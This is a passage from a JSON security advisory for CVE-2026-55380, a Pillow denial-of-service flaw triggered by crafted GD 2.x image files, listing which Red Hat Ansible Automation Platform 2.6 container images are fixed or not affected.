"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497455"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit this vulnerability by providing a specially crafted GD 2.x image file. The GdImageFile._open() function reads image dimensions without proper validation, leading to excessive memory allocation. This can result in a Denial of Service (DoS) due to C-heap exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via crafted GD 2.x image file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A denial-of-service vulnerability was found in Pillow\u0027s GdImageFile plugin. The GdImageFile._open() function reads image dimensions from GD 2.x file headers and stores them without performing a decompression bomb check. A crafted .gd file of approximately 1 KB can trigger an unchecked 4.3 GB C-heap allocation, potentially crashing the process or exhausting memory on systems with insufficient resources. This issue is fixed in Pillow 12.3.0.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-55380"
},
{
"category": "external",
"summary": "RHBZ#2497455",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497455"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-55380",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-55380"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-55380",
